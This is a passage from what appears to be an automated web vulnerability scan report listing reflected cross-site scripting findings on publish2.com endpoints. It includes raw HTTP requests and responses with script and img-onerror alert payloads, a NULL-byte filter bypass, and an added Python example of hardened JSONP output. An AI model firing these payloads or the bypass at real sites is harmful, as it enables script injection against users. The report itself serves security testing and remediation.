Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:44 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:44 GMT; path=/
Set-Cookie: kohanasession=nbeoje320ud00u58pjejkuohi3; path=/
Set-Cookie: kohanasession=nbeoje320ud00u58pjejkuohi3; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJuYmVvamUzMjB1ZDAwdTU4cGplamt1b2hpMyI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwNTs%3D; path=/
Content-Length: 5503
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<form method="post" action="http://www.publish2.com/login?%006a091"><script>alert(1)</script>ff942affee7=1">
...[SNIP]...

2.369. http://www.publish2.com/search/links [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links

Issue detail

The value of the callback request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f93f2"><script>alert(1)</script>f7e2eb1550e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/links?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065f93f2"><script>alert(1)</script>f7e2eb1550e HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kohanasession=bjt7b5i28b37sqvf162ehncch6; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJianQ3YjVpMjhiMzdzcXZmMTYyZWhuY2NoNiI7dG90YWxfaGl0c3xpOjI7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDQ5NTY7

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:15:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:15:47 GMT; path=/
Set-Cookie: kohanasession=op3nnnpqjgr1hela4rskhf33p2; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJvcDNubm5wcWpncjFoZWxhNHJza2hmMzNwMiI7dG90YWxfaGl0c3xpOjM7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNDg7; path=/
Content-Length: 7840
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<a class="button RSS" href="/search/links.rss?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065f93f2"><script>alert(1)</script>f7e2eb1550e">
...[SNIP]...

2.370. http://www.publish2.com/search/links [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055565"><script>alert(1)</script>3d327ec153a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55565"><script>alert(1)</script>3d327ec153a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search/links?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065&%0055565"><script>alert(1)</script>3d327ec153a=1 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kohanasession=bjt7b5i28b37sqvf162ehncch6; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJianQ3YjVpMjhiMzdzcXZmMTYyZWhuY2NoNiI7dG90YWxfaGl0c3xpOjI7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDQ5NTY7

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:15:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:15:52 GMT; path=/
Set-Cookie: kohanasession=8kv08e6eh1qe1n2g4mtn088lq3; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI4a3YwOGU2ZWgxcWUxbjJnNG10bjA4OGxxMyI7dG90YWxfaGl0c3xpOjM7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNTM7; path=/
Content-Length: 7614
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<a class="button RSS" href="/search/links.rss?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065&%0055565"><script>alert(1)</script>3d327ec153a=1">
...[SNIP]...

2.371. http://www.publish2.com/search/links [number_of_items parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links

Issue detail

The value of the number_of_items request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d376"><script>alert(1)</script>55c0ff8b4ca was submitted in the number_of_items parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/links?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=54d376"><script>alert(1)</script>55c0ff8b4ca&callback=jsonp1292504943065 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kohanasession=bjt7b5i28b37sqvf162ehncch6; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJianQ3YjVpMjhiMzdzcXZmMTYyZWhuY2NoNiI7dG90YWxfaGl0c3xpOjI7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDQ5NTY7

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:15:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:15:47 GMT; path=/
Set-Cookie: kohanasession=q5trom0f7bb2kq1si0f4o9p7s7; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJxNXRyb20wZjdiYjJrcTFzaTBmNG85cDdzNyI7dG90YWxfaGl0c3xpOjM7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNDg7; path=/
Content-Length: 7840
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<a class="button RSS" href="/search/links.rss?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=54d376"><script>alert(1)</script>55c0ff8b4ca&callback=jsonp1292504943065">
...[SNIP]...

2.372. http://www.publish2.com/search/links [tag parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links

Issue detail

The value of the tag request parameter is copied into the HTML document as plain text between tags. The payload 995a1<script>alert(1)</script>7d913aca67c was submitted in the tag parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/links?newsgroup=jeff+jarvis+links&tag=wwgd995a1<script>alert(1)</script>7d913aca67c&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kohanasession=bjt7b5i28b37sqvf162ehncch6; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJianQ3YjVpMjhiMzdzcXZmMTYyZWhuY2NoNiI7dG90YWxfaGl0c3xpOjI7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDQ5NTY7

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:15:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:15:47 GMT; path=/
Set-Cookie: kohanasession=s16hd7ufqbn20cglu92o0bsas0; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJzMTZoZDd1ZnFibjIwY2dsdTkybzBic2FzMCI7dG90YWxfaGl0c3xpOjM7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNDg7; path=/
Content-Length: 7402
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<strong class="active">wwgd995a1<script>alert(1)</script>7d913aca67c</strong>
...[SNIP]...

2.373. http://www.publish2.com/search/links.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links.js

Issue detail

The value of the callback request parameter is copied verbatim to the start of the JSONP response body, where it becomes the name of the function that wraps the JSON data; it is also echoed inside the title string. The payload f2898<script>alert(1)</script>852eec1b1c was submitted in the callback parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that the callback name is not validated, so a caller can place arbitrary text, including HTML tags, at the beginning of the response. Two caveats apply. The response is served as application/json, which current browsers do not render as HTML on direct navigation, so the injected tags execute only in a browser that sniffs the body as HTML or in a page that writes the response text into the DOM. Independently of that, an unrestricted callback is a defect in its own right: a page that loads this endpoint through a script tag executes whatever the callback parameter contains as JavaScript, so the name must be validated server-side against a strict identifier pattern and the response should carry X-Content-Type-Options: nosniff.

Request

GET /search/links.js?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065f2898<script>alert(1)</script>852eec1b1c HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:46 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:46 GMT; path=/
Set-Cookie: kohanasession=dkobbj8ikt6dkucplqbeftblo7; path=/
Set-Cookie: kohanasession=dkobbj8ikt6dkucplqbeftblo7; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJka29iYmo4aWt0NmRrdWNwbHFiZWZ0YmxvNyI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwNzs%3D; path=/
Content-Length: 713
Connection: close
Content-Type: application/json; charset=utf-8

jsonp1292504943065f2898<script>alert(1)</script>852eec1b1c({"title":"Publish2 Links - newsgroup: jeff jarvis links, tag: wwgd, number_of_items: 5, callback: jsonp1292504943065f2898<script>alert(1)<\/s
...[SNIP]...
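The fix for the callback and value reflections in /search/links.js, as an added Python example (not Publish2's code, which the X-Powered-By header shows is PHP, and not taken from the report): the vulnerable emitter models what the responses in this section show, while the hardened one validates the callback against an identifier pattern, \u-escapes <, > and & inside the JSON so the body contains no HTML-significant bytes, serves it as application/javascript with X-Content-Type-Options: nosniff, and prefixes /**/ so the response never starts with caller-chosen bytes. The payloads are copied from findings 2.373 and 2.375; the function names, the response shape and the /**/ prefix are this example's choices.

```python
"""Vulnerable versus hardened JSONP emission (added example, not Publish2 code)."""
import json
import re
from typing import Dict, Tuple

# A JSONP callback must be a plain (optionally dotted) JavaScript identifier.
CALLBACK_RE = re.compile(r"[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*")

# Characters that let a JSON body be sniffed as HTML or break out of a
# <script> or JS string context, mapped to escapes that remain valid JSON.
JS_UNSAFE = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026",
             "\u2028": "\\u2028", "\u2029": "\\u2029"}


def vulnerable_jsonp(callback: str, data: dict) -> Tuple[Dict[str, str], str]:
    """Models the reported behaviour: the callback is concatenated verbatim and
    json.dumps leaves '<' and '>' untouched inside string values."""
    headers = {"Content-Type": "application/json; charset=utf-8"}
    return headers, f"{callback}({json.dumps(data)})"


def safe_json(data) -> str:
    """JSON text with HTML-significant characters \\u-escaped; it decodes to
    the same value but contains no '<', '>' or '&' bytes."""
    text = json.dumps(data, ensure_ascii=False)
    for ch, esc in JS_UNSAFE.items():
        text = text.replace(ch, esc)
    return text


def hardened_jsonp(callback: str, data: dict) -> Tuple[Dict[str, str], str]:
    """Reject anything but an identifier as callback, escape the payload, label
    the body as script and forbid content-type sniffing. The leading /**/ keeps
    the response from starting with caller-chosen bytes."""
    if not CALLBACK_RE.fullmatch(callback):
        raise ValueError("invalid JSONP callback name")
    headers = {"Content-Type": "application/javascript; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}
    return headers, f"/**/{callback}({safe_json(data)});"


def jsonp_payload(body: str, callback: str) -> dict:
    """Decode a hardened response back to its data (round-trip check)."""
    prefix = f"/**/{callback}("
    if not (body.startswith(prefix) and body.endswith(");")):
        raise ValueError("not a hardened JSONP body")
    return json.loads(body[len(prefix):-2])


# Payloads copied from findings 2.373 and 2.375 of the report.
CALLBACK_PAYLOAD = "jsonp1292504943065f2898<script>alert(1)</script>852eec1b1c"
TITLE_PAYLOAD = "jeff jarvis linksc22e5<img src=a onerror=alert(1)>24d8948e107"

if __name__ == "__main__":
    print(vulnerable_jsonp(CALLBACK_PAYLOAD, {"title": TITLE_PAYLOAD})[1])
    try:
        hardened_jsonp(CALLBACK_PAYLOAD, {"title": TITLE_PAYLOAD})
    except ValueError as exc:
        print("rejected:", exc)
    print(hardened_jsonp("jsonp1292504943065", {"title": TITLE_PAYLOAD})[1])
```

Running it prints the vulnerable body with the script tags intact, then the rejection of the 2.373 callback, then a hardened body in which the img tag from 2.375 survives only as \u003cimg ... \u003e, which a JSON consumer decodes to the original text while no HTML parser sees a tag.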

2.374. http://www.publish2.com/search/links.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.publish2.com
Path:   /search/links.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the JSON response body, inside the feedlink string value, without HTML or JSON escaping. The payload %0024e9d<a>087e3093433 was submitted as the name of an arbitrarily supplied request parameter, and 24e9d<a>087e3093433 appears in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The scanner reports that the application blocks certain characters that are often used in XSS attacks and that submitting a URL-encoded NULL byte (%00) anywhere before those characters circumvents the block. Verify this before relying on it: the feedlink value in the response below reproduces the raw query string with %00 still encoded, so in this instance the <a> tag was reflected without the NULL byte being decoded, and the same request without %00 should be compared.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search/links.js?%0024e9d<a>087e3093433=1 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:42 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:42 GMT; path=/
Set-Cookie: kohanasession=rnodfgv1jj13rfl0bhbi1i0sd2; path=/
Set-Cookie: kohanasession=rnodfgv1jj13rfl0bhbi1i0sd2; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJybm9kZmd2MWpqMTNyZmwwYmhiaTFpMHNkMiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwMzs%3D; path=/
Content-Length: 5518
Connection: close
Content-Type: application/json; charset=utf-8

{"title":"Publish2 Links","feedlink":"http:\/\/www.publish2.com\/search\/links.js?%0024e9d<a>087e3093433=1","sitelink":"http:\/\/www.publish2.com\/","description":"Publish2 Links","last_build_date":"Thu, 16 Dec 2010 13:16:43 +0000","total_feed_items":206584,"generator":"Publish2","items":[{"title":"Memo_
...[SNIP]...

2.375. http://www.publish2.com/search/links.js [newsgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links.js

Issue detail

The value of the newsgroup request parameter is copied into the JSON response body, inside the title string value, without HTML or JSON escaping. The payload c22e5<img%20src%3da%20onerror%3dalert(1)>24d8948e107 was submitted in the newsgroup parameter. This input was echoed as c22e5<img src=a onerror=alert(1)>24d8948e107 in the application's response.

This proof-of-concept attack demonstrates that arbitrary markup, here an img element whose onerror handler carries the JavaScript, reaches the response unencoded. Note that the response is served as application/json: the handler fires only where the body is rendered as HTML, that is in a browser that sniffs the content type, or in a page that writes the title into the DOM without escaping it. The unescaped reflection is the defect to fix either way.

Request

GET /search/links.js?newsgroup=jeff+jarvis+linksc22e5<img%20src%3da%20onerror%3dalert(1)>24d8948e107&tag=wwgd&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

